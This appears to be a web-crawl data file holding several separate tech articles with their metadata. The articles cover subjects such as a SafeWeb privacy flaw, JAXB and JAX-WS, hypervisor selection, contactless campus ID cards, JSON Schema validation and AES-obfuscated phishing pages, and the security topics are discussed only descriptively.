“The pilot just has to go to the spray area, activate the unit, and it’ll set up the first line,” said Stephen Bradshaw, the district’s aerial operations supervisor. “It’ll show the pilot where to go so the product will drift across the spray area and be more effective.”
The district also plans to upgrade its land-based technology. Instead of having inspectors report larva site findings manually, the agency is seeking a tablet or smartphone system to enter the information digitally. This way, data is directly entered on the map pilots will use to direct their spraying.
Photo courtesy of Shutterstock. Read more about dirty jobs in government. | <urn:uuid:f7b7adca-2c45-4db4-b8fa-f65275c02f50> | CC-MAIN-2017-04 | http://www.govtech.com/geospatial/Dirty-Jobs-in-Government-Pest-Mitigation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00391-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919287 | 341 | 3.390625 | 3 |
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
Two researchers discovered the flaw; David Martin, a computer science professor at Boston University, and Andrew Schulman, a researcher at the Privacy Foundation. Martin and Schulman showed how they were able to trick a Web browser into divulging a user's IP address and cookie information. Political dissidents, consumers and government agencies use SafeWeb to protect their Web activity online.
"We have found that the SafeWeb service is seriously and fundamentally flawed," said Schulman. "Our paper documents spectacular failures of the service, based on extremely simple attacks."
SafeWeb was aware of the problems as early as last year, said co-founder and chief executive Stephen Hsu, but the company decided not to develop repairs after abandoning its consumer business and licensing its technology to PrivaSec in August.
PrivaSec chief executive Geoffrey Riggs acknowledged that "there are certain vulnerabilities to SafeWeb and SurfSecure secure surfing technology" and added that the company is working to develop patches. PrivaSec claimed that the "likelihood of such an attack on a user living in a free, non-politically-repressed society is relatively low."
Martin criticised this approach. "Frankly, I can't think of any other security system that is considered secure by nature of it being unlikely to be attacked," he said.
SafeWeb is used by thousands of politically oppressed people around the world to shield their Web activities. | <urn:uuid:85ddbdfc-720d-49d0-84d2-92c281cb4c09> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/2240044355/SafeWeb-users-vulnerable | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00117-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964416 | 313 | 2.703125 | 3 |
JAX is a common term used for JAX-B and JAX-WS technologies which are basic building blocks of WebService. WebService is a distributed web application which uses open XML-based standards and transport protocols to exchange data between remote devices. Starting from Java6 the said WebService fundamental classes are bundled within JDK itself. The main intention is to help WebService development instead of using an application container like Tomcat / WebSphere. JDK also bundles a light weight WebService container to host the WebService testing.
1) What is JAXB?
JAXB is also known as Java API for XML binding. JAXB technology make easier to transform and access data from XML within Java and also to create an XML from the representing Java objects. For JAXB, JDK provides API's (javax.xml.bind), compiler tools (xjc & schemagen) and a framework with implementation that automates mapping between
a) In memory Java Objects to XML
b) XML to in memory Java Object.
a) is commonly called as JAXB marshal while b) is commonly called as JAXB un-marshal. JAXB Marshalling provides a client application the ability to convert a JAXB-derived Java object tree back into XML data form. JAXB Marshalling process can be compared to Object serialization where java object is converted into network friendly way. JAXB Unmarshalling provides a client application the ability to convert XML data into JAXB-derived Java objects. JAXB UnMarshalling process can be compared to Object de-serialization, where network transmitted Object bytes are converted back to Java Objects.
JAXB provides an efficient and standard way of mapping between XML and Java Object. Comparing to XML parsing using DOM / SAX, JAXB uses lesser memory footprint. JAXB create objects based on demand and thus uses memory efficiently.
2) What are all JAXB Compilers tools?
JAXB compilers are used to generated JAXB artifact which are essential during JAXB runtime, for Marshalling and Un-Marshalling.
i) xjc : generate fully annotated Java classes from a XML schema file.
usage : xjc [-options ...] <schema file>
ii) schemagen : can generate a schema file from JAXB annotated Java classes
usage: schemagen [-options ...] [java source files]
3) What is JAX-WS technology?
JAX-WS means Java API for XML Web Services and it the technology helps to build client server Web Services. JAX-WS implementation under the hood utilizes JAXB for XML to Java and Java to XML conversion for WebService communication. Old implementations of WebServices were based on Remote procedure Call (RPC) which uses RMI underneath. JAX-WS hides all SOAP operation form a WebService developer and he is not supposed to know in depth about SOAP unless if some problem rises for debugging.
With JAX-WS, WebService, it is supported through open standards a JAX-WS client (java client) can access any other compatible service provided (either it can Java service, or can be a .Net service). This is feasible because JAX-WS uses technologies defined by the World Wide Web Consortium (W3C): HTTP, SOAP, and the Web Service Description Language (WSDL). WSDL specifies an XML format for describing a service as a set of endpoints operating on messages.
4) What are all JAX-WS tooling supported by JDK?
Like the JAX-RPC tooling, the JAX-WS tooling provides tools to help with bottoms-up (wsgen) and top-down (wsimport) development approaches.
i) wsgen (with JAX RPC this was called java2wsdl)
wsgen tool help to generate WebService artifacts from an annotated Java class. The tool produces Java classes from the annotated class, required to build the WSDL.
Usage : wsgen [–options] [Java service class (SEI)]
ii) wsimport (with JAX RPC this was called wsdl2java)
wsimport tool helps to write a Java Web Service client using artifact generated by wsgen.
Usage: wsimport [-options] [WSDL file] | <urn:uuid:5c56ac44-edd9-4659-b4fb-1cbfa8dd682b> | CC-MAIN-2017-04 | https://www.ibm.com/developerworks/community/blogs/738b7897-cd38-4f24-9f05-48dd69116837/tags/jaxb?lang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00327-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.864058 | 922 | 3.53125 | 4 |
Virtualization improves IT resource utilization by treating your company's physical resources as pools from which virtual resources can be dynamically allocated.
Virtualization involves a shift in thinking from physical to logical, treating IT resources as logical resources rather than separate physical resources. Using virtualization in your environment, you are able to consolidate resources such as processors, storage, and networks into a virtual environment which provides the following benefits:
- Consolidation to reduce hardware cost.
- Optimization of workloads.
- IT flexibility and responsiveness.
Virtualization is the creation of flexible substitutes for actual resources — substitutes that have the same functions and external interfaces as their actual counterparts but that differ in attributes such as size, performance, and cost. These substitutes are called virtual resources; their users are typically unaware of the substitution.
Virtualization is commonly applied to physical hardware resources by combining multiple physical resources into shared pools from which users receive virtual resources. With virtualization, you can make one physical resource look like multiple virtual resources.
Furthermore, virtual resources can have functions or features that are not available in their underlying physical resources.
System virtualization creates many virtual systems within a single physical system. Virtual systems are independent operating environments that use virtual resources. Virtual systems running on IBM® systems are often referred to as logical partitions or virtual machines. System virtualization is most commonly implemented with hypervisor technology.
Hypervisors are software or firmware components that can virtualize system resources
Figure 1. Virtualization, a shift in thinking from the physical to the logical
Now let's look at the types of hypervisors.
Hypervisors in general
There are two types of hypervisors:
- Type 1 hypervisor
- Type 2 hypervisor
Type 1 hypervisors run directly on the system hardware. Type 2 hypervisors run on a host operating system that provides virtualization services, such as I/O device support and memory management. Figure 2 shows how type 1 and type 2 hypervisors differ.
Figure 2. Differences between type 1 and 2 hypervisors
The hypervisors described in this series are supported by various hardware platforms and in various cloud environments:
- PowerVM: A feature of IBM POWER5, POWER6, and POWER7 servers, support provided for it on IBM i, AIX®, and Linux®.
- VMware ESX Server: A "bare metal" embedded hypervisor, VMware ESX's enterprise software hypervisors run directly on server hardware without requiring an additional underlying operating system.
- Xen: A virtual-machine monitor for IA-32, x86-64, Itanium, and ARM architectures, Xen allows several guest operating systems to execute on the same computer hardware concurrently. Xen systems have a structure with the Xen hypervisor as the lowest and most privileged layer.
- KVM: A virtualization infrastructure for the Linux kernel, KVM supports native virtualization on processors with hardware virtualization extensions. Originally, it supported x86 processors, but now supports a wide variety of processors and guest operating systems including many variations of Linux, BSD, Solaris, Windows®, Haiku, ReactOS, and the AROS Research Operating System (there's even a modified version of qemu that can use KVM to run Mac OS X).
- z/VM: The current version of IBM's virtual machine operating systems, z/VM runs on IBM's zSeries and can be used to support large numbers (thousands) of Linux virtual machines.
All of these hypervisors are supported by IBM hardware.
The individual linked articles describe in detail the features, functionalities, and methods to deploy and manage the virtual systems with corresponding hypervisors.
Choosing the right hypervisor
One of the best ways to determine which hypervisor meets your needs is to compare their performance metrics. These include CPU overhead, amount of maximum host and guest memory, and support for virtual processors.
But metrics alone should not determine your choice. In addition to the capabilities of the hypervisor, you must also verify the guest operating systems that each hypervisor supports.
If you are running heterogeneous systems in your service network, then you must select the hypervisor that has support for the operating systems you currently run. If you run a homogeneous network based on Windows or Linux, then support for a smaller number of guest operating systems might fit your needs.
All hypervisors are not made equal, but they all offer similar features. Understanding the features they have as well as the guest operating systems each supports is an essential aspect of any hardware virtualization hypervisor selection process. Matching this data to your organization's requirements will be at the core of the decision you make. (To get started with this process, explore the details of each hypervisor.)
The following factors should be examined before choosing a suitable hypervisor.
Virtual machine performance
Virtual systems should meet or exceed the performance of their physical counterparts, at least in relation to the applications within each server. Everything beyond meeting this benchmark is profit.
Ideally, you want each hypervisor to optimize resources on the fly to maximize performance for each virtual machine. The question is how much you might be willing to pay for this optimization. The size or mission-criticality your project generally determines the value of this optimization.
Look for support for hardware-assisted memory virtualization. Memory overcommit and large page table support in the VM guest and hypervisor are preferred features; memory page sharing is an optional bonus feature you might want to consider.
Each major vendor has its own high availability solution and the way each achieves it may be wildly different, ranging from very complex to minimalist approaches. Understanding both the disaster prevention and disaster recovery methods for each system is critical. You should never bring any virtual machine online without fully knowing the protection and recovery mechanisms in place.
Live migration is extremely important for users; along with support for live migration across different platforms and the capability to simultaneously live migrate two or more VMs, you need to carefully consider what the individual hypervisor offers in this area.
Networking, storage, and security
In networking, hypervisors should support network interface cards (NICs) teaming and load balancing, Unicast isolation, and support for the standard (802.1Q) virtual local area network (VLAN) trunking.
Each hypervisor should also support iSCSI- and Fibre Channel-networked storage and enterprise data protection software support with some preferences for tools and APIs, Fibre Channel over Ethernet (FCoE), and virtual disk multi-hypervisor compatibility.
Look for such management features as Simple Network Management Protocol (SNMP) trap capabilities, integration with other management software, and fault tolerance of the management server — these features are invaluable to a hypervisor.
A few suggestions ...
Now I don't want to influence your choice of hypervisor (after all, your needs and requirements are unique), but here are a few general suggestions from my experience with implementation of hypervisors for cloud-based workloads:
- For UNIX®-based workloads, business-critical applications comprised of heavy transactions where performance is the paramount requirement, the PowerVM hypervisor is capable of handling that sort of load.
- If you're running business-critical applications on System X (x86 servers for Windows and Linux), VMware ESX works quite well.
- If your applications aren't particularly business critical, you might try KVM or Xen (the startup costs for these is relatively inexpensive too).
You can even try out some of the freeware VMs like Xen and KVM.
IT managers are increasingly looking at virtualization technology to lower IT costs through increased efficiency, flexibility, and responsiveness. As virtualization becomes more pervasive, it is critical that virtualization infrastructure can address the challenges and issues faced by an enterprise datacenter in the most efficient manner.
Any virtualization infrastructure looking for mainstream adoption in data centers should offer the best-of-breed combination of several important enterprise readiness capabilities:
- Ease of deployment,
- Manageability and automation,
- Support and maintainability,
- Reliability, availability, and serviceability
This article introduced the concept of system virtualization and hypervisors, demonstrated the role a hypervisor plays in system virtualization, and offered some topic areas to consider when choosing a hypervisor to support your cloud virtualization requirements.
Links for this series:
- The PowerVM site.
- Red Hat Enterprise Virtualization 3.0 Administration Guide.
- VMware's Quick Start Guide version 5.17 | version 4.15.
- VMware vSphere overview.
- Getting Started with Xen Deployment online book.
- List of KVM documentation.
- Red Hat Enterprise Virtualization 3.0 Administration Guide (for help with KVM).
- IBM Director's Virtualization Manager can let you manage all your z/VM virtualized systems from the same console.
- In the developerWorks cloud developer resources, discover and share knowledge and experience of application and services developers building their projects for cloud deployment.
- Join a cloud computing group on developerWorks.
- Read all the great cloud blogs on developerWorks.
- Join the developerWorks community, a professional network and unified set of community tools for connecting, sharing, and collaborating.
Dig deeper into Cloud computing on developerWorks
Exclusive tools to build your next great app. Learn more.
Crazy about Cloud? Sign up for our monthly newsletter and the latest cloud news.
Deploy public cloud instances in as few as 5 minutes. Try the SoftLayer public cloud instance for one month. | <urn:uuid:9e958f7c-75c2-4c03-8178-92a5385f7f97> | CC-MAIN-2017-04 | http://www.ibm.com/developerworks/cloud/library/cl-hypervisorcompare/index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00143-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.904727 | 1,953 | 3.296875 | 3 |
The Staggering Scope of Big Data
The amount of data we're all generating at any given time is astronomical. Jump on the big-data train or risk getting left behind.
So you've been hearing about storage lately, maybe a lot. Well, that shouldn't come as too much of a surprise. Storage is a hot category for a lot of reasons, but the main driver of demand for storage is something that has now become a familiar buzz phrase: big data.
Simply put (and it's scary to think that anybody in IT wouldn't know this) massive data growth is driving a panic scramble for storage solutions. But how massive is this massive growth in data volume? It's incomprehensible actually, or nearly so.
Let's take a look at some of the numbers that make up big data. A summary from Villanova University offers a few numbers:
- Users create 2.5 quintillion bytes of data every day. Essentially, this means that 90 percent of the data in the world today has been created in the last two years alone.
- Retailer Walmart alone controls more than 1 million customer transactions every hour -- and then transfers them all to a database that stores more than 2.5 petabytes of information
- There are 45 billion photographs (and counting) in Facebook's database. That's more than six photos for every human being on earth.
But wait...there's more. According to Domo, a business-intelligence firm, every 60 seconds, technology users:
- Send 204 million e-mails;
- Upload 3000 videos to YouTube;
- Tweet 100,000 times;
- Download 47,000 applications from an app store.
And those numbers are already old. They were old the first time somebody typed them. So, are we humans just that much smarter than we used to be? Do we just know that much more? Maybe, but one of the drivers of big data is the storage of increasingly massive file types -- think MRIs and sonograms.
Then there are government regulations, social media, the proliferation of online video, streaming-video services, blogs about storage... The stuff we're storing is just bigger, broader and greater in volume than it has ever been before. That's all there is to it.
So, what does this all mean? Well, for one thing, now would be a good time to acquire skills in working with big data. There will soon -- within the next few years -- be significant shortages of IT people who know how to handle big data. And then there's the investment that big data will require. That brings us full circle to our discussion of storage. All of this stuff has to go somewhere and be accessible and recoverable -- and soon.
It's not that IT professionals don't know all this. It's just that the numbers provide a stark reminder of the onslaught of big data that's happening right now and a harbinger of what's to come. Get ready. | <urn:uuid:61960ab1-87a1-4dea-bb14-9c489aa28094> | CC-MAIN-2017-04 | https://esj.com/articles/2014/04/29/scope-of-big-data.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00565-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95393 | 605 | 2.921875 | 3 |
Securing Web Services
Today’s business demands an infrastructure that supports mission-critical Web services. Web sites are no longer about just providing information about a business, but increasingly are being positioned to deliver Web services—via both intranets and extranets. The challenge in providing Web services is security—how to manage users effectively while protecting access to sensitive business or consumer information. Security professionals and architects are increasingly finding themselves developing solutions that enable secure access to Web-based resources.
Businesses across almost all vertical industries are moving more and more of their business processes online. The e-business objective is to reach new markets and new users, increase revenues, reduce costs, reduce response times and enhance the customer experience with the organization. This requires providing online, real-time access to sensitive information for customers, employees and business partners. The challenge for the organization is how to provide such access so as to further enable the business, yet define and enforce Web-access privileges to limit exposure to authorized entities only.
What Is a Web Service?
Web services enable businesses to deliver business applications to customers, partners and employees over the Internet. The Web-service consumer or client makes the request and gets a response from one or more Web-service providers. The Web-service provider receives the request and sends the response to the consumer or client. The data format that enables this communication between the consumer or client and the provider is the extensible markup language (XML). The XML Schema is the framework that describes XML vocabularies used in business transactions.
The challenge with Web services is how to secure the exchange of information between the consumer and the provider. There are a few organizations that are influencing standards in the area of Web services security. These organizations include:
- World Wide Web Consortium (W3C)
- Organization for the Advancement of Structured Information Standards (OASIS)
- Liberty Alliance
- Web Services Interoperability Organization (WS-I)
The World Wide Web Consortium (W3C) was established in 1994 with the objective of creating standards for the Web. It is supported by more than 450 members and about 70 full-time employees. It is famous for introducing standards such as HTTP and HTML. W3C is involved in Web services activities as an extension of its core standards, such as XML. See www.w3c.org for more information.
Founded in 1993 under the name of SGML, the Organization for the Advancement of Structured Information Standards (OASIS) developed the security assertions markup language (SAML) standard. SAML is an XML framework for exchanging authentication and authorization information. OASIS has more than 600 corporate and individual members in 100 countries around the world. OASIS and the United Nations jointly sponsor ebXML (www.ebxml.org), a global framework for e-business data exchange. More information on OASIS is available at www.oasis-open.org.
The Liberty Alliance Project was formed in September 2001 with the objective of developing specifications in the area of identity management to enable the deployment of identity-based Web services. The Liberty Alliance Project has adopted SAML 1.1 as the foundation for its work on Federated Identity. Federated Identity allows users to link identity information between accounts without centrally storing personal information. The user can control when and how his accounts and attributes are linked and shared between domains and service providers, allowing for greater control over his personal data. In practice, this means that users can be authenticated by one company or Web site and be recognized and delivered personalized content and services in other locations without having to re-authenticate or sign on with a separate user name and password.
The Liberty Alliance Project membership includes VeriSign, Sony, Sun, HP, GM, Nokia, Netegrity, RSA Security and many others. More information on the Liberty Project Alliance is available at www.projectliberty.org.
Formed in February 2002, the Web Services Interoperability Organization (WS-I) is focused on providing consistent and reliable interoperability among Web services across platforms, applications and programming languages. WS-I recently introduced the Basic Profile 1.0. The Basic Profile 1.0 consists of implementation guidelines on how core Web services specifications should be used together to develop interoperable Web services. The specifications covered by the Basic Profile include SOAP 1.1, WSDL 1.1, UDDI 2.0, XML 1.0 and XML Schema. More information on the WS-I is available at www.ws-i.org.
Core Web Services Standards
There are four standards that provide the foundation for Web services. They are
- Extensible markup language (XML)
- Simple object access protocol (SOAP)
- Web services description language (WSDL)
- Universal description, discovery and integration (UDDI)
Created by the W3C, XML is what enables the flexibility of Web services. It makes it straightforward to develop customized markup languages that define how information is to be structured and processed. It is the lingua franca of Web services. All Web services communicate in XML.
SOAP is an XML-based messaging protocol that provides a uniform way to exchange XML-formatted information using HTTP. It is a communications protocol for Web services.
Developed by the W3C, WSDL defines methods for creating detailed descriptions of Web services. It is an XML-based language for describing, finding and using Web services.
UDDI provides a method for publishing service descriptions so Web services can be located and accessed by other Web services. It is a phone directory for Web services that lists available Web services from different companies, their descriptions and instructions for using them.
Security Assertions Markup Language (SAML)
The security assertions markup language (SAML) is an XML-based framework that enables Web services to readily exchange information relating to authentication and authorizations. SAML enables single sign-on, providing the ability to use a variety of Internet resources without having to log in repeatedly. SAML is a Web-services-based request/reply protocol for the exchange of authentication, attribute and authorization decision statements.
SAML takes the information in the form of trusted statements, referred to as security assertions, about end-users, Web services or any other entity that can be assigned a digital identity. SAML “buffers” the application from the complexity of the underlying authentication and authorization systems. Security assertion is a primary objective of the SAML specification. A security assertion is a claim or statement regarding the security properties of a given end-user that one organization needs to pass to another organization. Examples of types of security assertions are:
- Authentication assertion
- Authorization decision assertion
- Requesting assertion
SAML has received widespread support from the industry, including from Sun, IBM, HP, BEA Systems and RSA Security. The U.S. Navy is adopting it as the standard for supporting authentication and authorization of end-users for Web services.
Solution Questions to Consider
There are several vendors that offer solutions in this area. Some questions to consider as you review possible vendors’ solutions are: | <urn:uuid:7f91d375-2d5c-4e33-ab02-ef895a1e2a81> | CC-MAIN-2017-04 | http://certmag.com/securing-web-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00291-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91022 | 1,472 | 2.6875 | 3 |
It’s going to take more than a village or engineers to address the most complex and critical needs of 21st century society and today, more than 120 of the country’s engineering schools said they would pump out a community of engineers explicitly equipped to tackle those problems.
Each of the 122 schools from Brown to Youngstown State has pledged to graduate a minimum of 20 students per year who will be specially prepared to lead the way in solving such large-scale problems, with the goal of training more than 20,000 formally recognized “Grand Challenge Engineers” over the next decade, the group stated in a letter to President Obama.
+ More on Network World: The weirdest, wackiest and coolest sci/tech stories of 2014+
The Grand Challenges which were developed by the National Academy of Engineering and National Science Foundation a few years ago include:
*Make solar energy affordable
* Provide energy from fusion
* Develop carbon sequestration methods
* Manage the nitrogen cycle
* Provide access to clean water
* Restore and improve urban infrastructure
* Advance health informatics
* Engineer better medicines
* Reverse-engineer the brain
* Prevent nuclear terror
* Secure cyberspace
* Enhance virtual reality
* Advance personalized learning
* Engineer the tools for scientific discovery
According to the group, the training model was inspired by the National Academy of Engineering-endorsed Grand Challenge Scholars Program (GCSP), established in 2009 by Duke’s Pratt School of Engineering, Olin College, and the University of Southern California’s Viterbi School of Engineering in response to the NAE’s 14 Grand Challenges for Engineering in the 21st century.
There are currently 20 active GCSPs and more than 160 NAE-designated Grand Challenge Scholars have graduated to date. Half of the graduates are women—compared with just 19% of U.S. undergraduate engineering students—demonstrating the program’s appeal to groups typically underrepresented in engineering, the group stated.
Check out these other hot stories: | <urn:uuid:ddcfad09-c50c-4394-854f-c0359af6c5cc> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2901039/careers/building-superior-engineers-to-address-the-century-s-greatest-engineering-challenges.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00199-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937341 | 422 | 3.15625 | 3 |
by: David Stallsmith
Senior Product Manager of Advanced Technology Cards
About 40 years ago, the first campus card was used to monitor access to a university dining hall. A few years later, the mag stripe card was introduced to the university campus. Since then, university ID cards have become as important as backpacks and blue jeans on campuses around the world.
One of the challenges for card offices, security, dining services, housing and IT personnel has been to decide which technologies will make their cards most successful and cost-effective on their campus. In the days of mag stripes and bar codes, this question usually answered itself. But now, with a multitude of chips available for cards, both contact and contactless, the decision has become more difficult.
Although ID Cards were first used for meal plans, it wasn't long before they began to be used to open doors (physical access). Following the lead of the hotel industry, the predominant technology used for physical access was the magnetic stripe. Also used widely for credit cards, the magnetic stripe card is fairly inexpensive and easy to program. The swipe readers on the doors around a campus could be in either online or offline mode.
Until recently, the magnetic stripe was considered secure enough for this physical access. Unfortunately, magnetic stripes have no particular inherent security and are very easy to duplicate. This is not considered a problem for the credit cards that we carry every day, because the credit card issuers (Visa, MasterCard) will not require us to pay for unauthorized purchases. This is a guarantee by the issuer and not a result of the security of the magnetic stripe. For the physical safety of the university population however, the magnetic stripe is now known to be insufficient. Recently, a number of universities have found their names in the local or national newspapers after a student had "cloned" the magnetic stripe card of a prominent university official or fellow student, and breached the system.
About 20 years ago, Prox cards with radio frequency IC chips were introduced. Transmitting at 125 KHz, they provided a much higher level of security than magnetic stripes. Not as easy to clone as a magnetic stripe card, Prox cards have become vulnerable to attacks as their technology has aged.
Recently, the Prox chip has been eclipsed by a new radio frequency chip, known as high frequency "contactless smart cards". Though they are used at the door in much the same manner as Prox cards, they operate at 13.56 MHz. Mifare, Legic and HID's iCLASS fall into this category. These chips provide a significantly more secure card-reader interface than the old Prox chips and their readers. Before the transmission of encrypted personal data, there is a challenge-and-response sequence of communications, through which the card and reader verify that each other is trustworthy for this transaction. Data stored on the card is also encrypted. A significant benefit of contactless over magnetic stripe cards is that the cards are not dragged through swipe readers, which is very damaging to the surface of the cards.
As a university considers changing to a card containing one of the newer technology chips, cost is certainly an important factor in the decision. Any card with a chip in it will be more expensive than a plain PVC card or even a mag stripe card. Installing new or replacing existing readers brings with it the costs of new readers and installation. Fortunately, new contactless card readers can often be installed in the place of existing prox or magnetic stripe readers with no significant change to the existing wiring or mounting box. There is a protocol for security wiring called "Wiegand" and it is an industry standard for many different types of readers. As plans are being made to upgrade an infrastructure, looking into the future reveals two new trends in card reader technology: Wireless contactless readers (Wi-Fi - 802.11), which can be installed in locations that are difficult or expensive to reach with wires; and IP-addressable network readers, which can be employed to interface directly with software and replace old control panels.
In future articles, I will discuss the workings of high frequency contactless cards and the new possibilities they bring for campus card use. Learn more about contactless cards here = Advanced Technology Cards, contact us Toll Free 888-682-6567 or email us at Support@colorid.com.
ColorID is a leading identification solutions provider to education, government, military, healthcare and other businesses. ColorID product offerings include: ID printers, software and supplies, advanced technology smart contact and contactless cards, biometric iris and finger print readers, pre-printed and blank plastic cards, and ID badge accessories (such as lanyards and card holders). ColorID offers installation, training, re-carding, extended warranties and support services on all the products we offer. ColorID's manufacturing partners include: HID, Fargo, IRIS ID, Datacard, Gemalto, Zebra, NiSCA, Evolis, Magicard, Integrated Biometrics, Oberthur, Privaris and many others. Contact ColorID at 704-987-2238 or toll free in Canada and the US at 888-682-6567. Visit ColorID on the web at: www.ColorID.com or email ColorID at email@example.com.
20480-F Chartwell Center Dr.
Cornelius, NC 28031
ColorID provides the highest quality products with superb service at an exceptional value. We want your experience with ColorID to be a positive one - from the ease of ordering products - to the quality of our products - to our follow up and our attention to detail.
CONVENIENT PAYMENT OPTIONS | <urn:uuid:1840a165-911e-4995-83c0-c67e23f7e1a2> | CC-MAIN-2017-04 | https://www.colorid.com/learning-center/considering-contactless-cards | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00529-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948352 | 1,164 | 2.609375 | 3 |
AJAX applications depend upon JSON services conforming to expectations. Unexpected behavior can occur if services provide responses in an unexpected format or with invalid content. For complex applications, you can mitigate the risk of unexpected behavior by implementing custom routines to validate service responses. Alternatively, you can exploit JSON Schema to validate input.
JSON Schema is a draft standard that specifies a JSON-based format for defining the structure of JSON data. As of this writing, the latest is draft-03 (see Resources).
This article compares a few of the JSON Schema validation routines. Learn to use the foremost libraries, and explore considerations and best practices for creating libraries to validate communications. The article also includes a new utility to help you write JSON Schemas.
Download the samples used in this article.
Choosing a library for your application
|Library (Author)||Draft versions support||Approximate library size|
|JSV: JSON Schema Validator (Gary Court)||draft-01, draft-02, draft-03||120KB|
|json-schema (Kris Zyp)||draft-03||10KB (requires CommonJS)|
|dojox.json.schema (Kris Zyp)||draft-02||10KB (requires Dojo)|
|schema.js (Andreas Kalsch)||draft-02 (partial)||10KB (requires CommonJS)|
An application based on Dojo might use the dojox.json.schema library because it is included in the toolkit. An application that needs to support multiple versions of the (draft) standard may use JSV.
dojox.json.schema appears to be a fork of json-schema so it will be similar in usage. schema.js implements only a subset of draft-02. This article concentrates on examples for using dojox.json.schema and JSV.
Listing 1 shows an HTML
snippet that validates a simple object. It is designed to be injected into
head HTML element.
Listing 1. Single use of dojox.json.schema
Listing 2 is an HTML snippet
that validates a simple object. It is designed to be injected into the
head HTML element.
Listing 2. Single use of JSV
JSV provides advanced failure information in the
errors array. Each error may contain the
- message: Human-readable error message.
- uri: URI of the failing object location.
- schemaUri: URI of the schema location causing failure.
- Attribute: Schema constraint causing failure.
- Details: Free-form array that includes further information, such as expected values.
Combining JSON Schema validation with XMLHttpRequest
When writing a library to obtain schemas and validate communications, consider:
- Overhead on page load. Preloading schemas may appear attractive but can slow down page load time.
- Overhead on AJAX calls. Lazy-loading schemas will have an impact on the first call that uses each schema. Validating every communication could introduce performance issues. Consider applying validation to more complex services.
Writing JSON schemas
The JSON Schema definition has many nuances, so writing and testing schemas can be challenging. This article includes the JSON Schema Lint utility, which you can download, to help you create and test JSON Schema.
Hints and tips
- The JSON Schema Internet Draft (see Resources) has a full definition of the JSON Schema specification and is an invaluable resource. Be sure to look at the latest draft.
- Consider using JSON Schema to assist with documenting services. Use
descriptionattribute to describe properties.
- When writing schemas, balance the needs of the application with validation strictness. Fully defining every attribute may make for rigorous validation, but it may also introduce fragility if the service is evolving with the application. JSON Schema allows for partial validation that can help in this area.
- Use the advanced capabilities of JSON Schema to lock down properties.
You can use
additionalProperties, enum, minItems, maxItems, and so on to increase constraints.
- When you need to allow for a property that might be multiple types,
you can use an array to define these. Alternatively, use the
|Sample, showing use of dojox.json.schema||dojox_json_schema-example.html||2KB|
|Sample, showing use of JSV||jsv-example.html||2KB|
|Utility for creating and testing JSON Schema||jsonschema.zip||140KB|
- JSON Schema: Learn more about the latest schemas, tools, and discussion.
- A JSON Media Type for Describing the Structure and Meaning of JSON Documents: Read the latest JSON Schema Internet Draft (a working document of the Internet Engineering Task Force (IETF).
- Documentation for dojox.json.schema: Learn how dojox.json.schema implements JSON Schema to provide data validation against JSON Schemas.
- Andreas Kalsch's schema.js library: Get more information about this sophisticated JSON Schema-based data validation and adaptation.
- Kris Zyp's json-schema library: Read about JSON Schema specifications, reference schemas, and a CommonJS implementation.
- developerWorks Web development zone: Find articles covering various web-based solutions. See the Web development technical library for a wide range of technical articles and tips, tutorials, standards, and IBM Redbooks.
- developerWorks technical events and webcasts: Stay current with technology in these sessions.
- developerWorks Live! briefings: Get up to speed quickly on IBM products and tools as well as IT industry trends.
- developerWorks on-demand demos: Watch demos ranging from product installation and setup for beginners, to advanced functionality for experienced developers.
- developerWorks on Twitter: Join today to follow developerWorks tweets.
Get products and technologies
- IBM product evaluation versions: Download or explore the online trials in the IBM SOA Sandbox and get your hands on application development tools and middleware products from DB2, Lotus, Rational, Tivoli, and WebSphere.
- developerWorks community: Connect with other developerWorks users while exploring the developer-driven blogs, forums, groups, and wikis.
- Find other developerWorks members interested in web development. | <urn:uuid:026ae4fd-491d-4e42-a9c4-74276b25f5a8> | CC-MAIN-2017-04 | http://www.ibm.com/developerworks/library/wa-jsonschema/index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00071-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.706797 | 1,352 | 2.53125 | 3 |
Phishers are making use of the Advanced Encryption Standard (AES) to conceal the malicious nature of their websites, according to security firm Symantec.
Nick Johnston of Symantec said: "This technique may be a first, albeit basic, attempt at using AES to obfuscate phishing sites.
"There is no attempt made to hide the key or otherwise conceal what is going on. However, we expect that as phishing detection matures further and improves in effectiveness, attacks like this will become more sophisticated."
The AES was adopted by the US government in 2002, and is used by the National Security Agency (NSA) to protect classified information in systems approved by the snooping group.
They have also made use of escape characters, which are used as part of URLs to avoid the misinterpretation of certain characters, for example by substituting a space for "%20". | <urn:uuid:5ee4488e-80b0-4fcf-b454-054d33214133> | CC-MAIN-2017-04 | http://www.cbronline.com/news/cybersecurity/nsa-encryption-standard-being-used-in-phishing-attacks-4363339 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00281-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947177 | 181 | 2.53125 | 3 |
